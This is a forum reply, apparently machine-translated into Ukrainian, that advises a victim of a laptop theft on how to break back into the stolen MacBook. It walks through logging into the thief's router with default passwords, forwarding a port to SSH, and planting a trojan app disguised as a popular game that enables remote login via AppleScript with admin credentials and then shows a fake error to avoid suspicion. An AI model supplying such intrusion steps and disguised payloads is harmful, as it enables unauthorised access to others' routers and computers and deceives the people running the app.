Я пам’ятаю, як дивився це відео доктора Зоза. Хороший матеріал.
Це здається, що ви компетентні до сценаріїв оболонок і просто потрібен вектор атаки. Ключовим моментом, щоби зробити щось подібне до того, що зробив Зоз, є отримання доступу до SSH. На відміну від його ситуації, коли злодій використовував комутований модем, це майже певно, оскільки новіші Macs не роблять комутований комутатор, що злодій використовує широкосмуговий зв'язок і стоїть за якимось NAT-роутером.
Навіть якщо SSH було включено на апараті, для маршрутизації маршрутизаторів портів потрібно було б встановити, щоб ви мали доступ до порту прослуховування SSH машини ззовні. Перевага широкосмугового зв'язку полягає в тому, що IP-адреса майже напевно змінюватиметься рідше, ніж при комутованому дозвоні.
Якби я був на вашому становищі, тримаючи IP-адресу злодія, спершу спробую увійти до веб-інтерфейсу їх маршрутизатора і побачити, що я можу зробити звідти. Дивно, скільки людей залишають на місці свої паролі маршрутизатора / модему, а в Інтернеті є списки, де можна знайти паролі за замовчуванням для більшості великих виробників.
Потрапивши всередину, перевірте список клієнтів DHCP на маршрутизаторі і побачите, чи зможете ви знайти MacBook. Багато маршрутизаторів покажуть MAC (апаратну) адресу, призначену внутрішню IP-адресу (найчастіше 192.168.1.x) і найголовніше - назву машини.
З'ясуйте, який IP призначений MacBook, а потім встановіть порт вперед до нього в налаштуваннях маршрутизатора. Використовуйте якийсь зовнішній порт, крім 22 (наприклад, порт 2222) і переадресуйте його на порт 22 IP-адреси MacBook.
У багатьох маршрутизаторів увімкнено доступ SSH, тому доступ до IP-порту злодія 22 може перейти до оболонки маршрутизатора, а не до корпусу машини. Тепер у вас повинен бути порт зовнішнього IP-адреса злодія (який ви отримали від Dropbox), який доставить вас безпосередньо до порту SSH, повинен бути прив’язаний до MacBook. За винятком SSH ще не ввімкнено.
Ця частина вимагає певних дій від злодія. Мені подобається ідея електронної пошти, але вона вимагає, щоб ваш друг використовував Apple Mail. Кращим підходом може бути завантаження спокусливого .app-файла в Dropbox, який увімкне SSH (Remote Login).
Це можна зробити за допомогою сценарію оболонки, але робити це за допомогою Applescript, зберегти Applescript у форматі .app і дати йому гарну піктограму - все це піде на довгий шлях до оману вашої позначки та не віддавання себе.
Ось код Applescript для ввімкнення віддаленого входу:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Цей біт коду поверне рядок із серійним номером машини, який ви можете надіслати електронною поштою, якщо хочете це зробити:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Я б написав яблучний сценарій, щоб він увімкнув віддалений вхід, робить все, що вам потрібно. Намагайтеся не скриптувати графічний інтерфейс або будь-які додатки, крім оболонки, оскільки це викликає підозру. В кінці відобразиться повідомлення про ефект "Ця програма не може працювати на цьому Macintosh." за допомогою кнопки "Вийти", щоб зменшити підозру. Після того, як сценарій працює в редакторі AppleScript, збережіть його як лише запущений файл .app.
Спробуйте замаскувати .app як популярну гру, Plants vs. Zombies або Angry Birds або щось подібне. Ви можете експортувати піктограму з реального .app гри та помістити її в .app, який експортуєте з Applescript. Якщо ваш друг добре поглянув на злодія, ви зможете впорядкувати його в ній і замаскувати .app як щось інше, що їх може зацікавити.
За умови, що ви можете налаштувати порт вперед (ваш знак не застосовує належних правил безпеки), і ви можете змусити його / її запускати програму, ви матимете повний доступ SSH до машини та можете продовжувати шукати підказки без негайно віддаючи свою присутність. Це також вимагає, щоб марка не втомлювалась від сповіщень Growl від Dropbox і закривала її, тому я б порадив вашому другові припинити збереження файлів на її Dropbox на деякий час.
Примітка. Якщо злодій відключиться від свого провайдера і знову підключиться, він отримає новий зовнішній IP-адресу. Додайте файл до Dropbox і чекайте його синхронізації. Це має отримати оновлений IP.
Примітка 2: Якщо користувач не підключається до маршрутизатора з MacBook протягом певного часу (зазвичай 24 години), термін оренди DHCP для внутрішньої IP-адреси, призначеної MacBook, закінчується. Швидше за все, він отримає ту ж IP-адресу наступного разу, коли підключиться, якщо інший пристрій не буде введено в мережу. У цьому випадку вам доведеться вручну увійти до маршрутизатора та змінити порт вперед.
Це не єдиний засіб нападу, але це те, що я робив би другий, коли зрозумів, що IP все ще оновлюється через Dropbox. Удачі!
EDIT: "Привілеї адміністратора" в кінці кожного рядка "do shell script" дуже важливі. Користувачеві буде запропоновано ввести пароль адміністратора вашого друга, і сценарій не вдасться, якщо ви не включите ім'я користувача та пароль.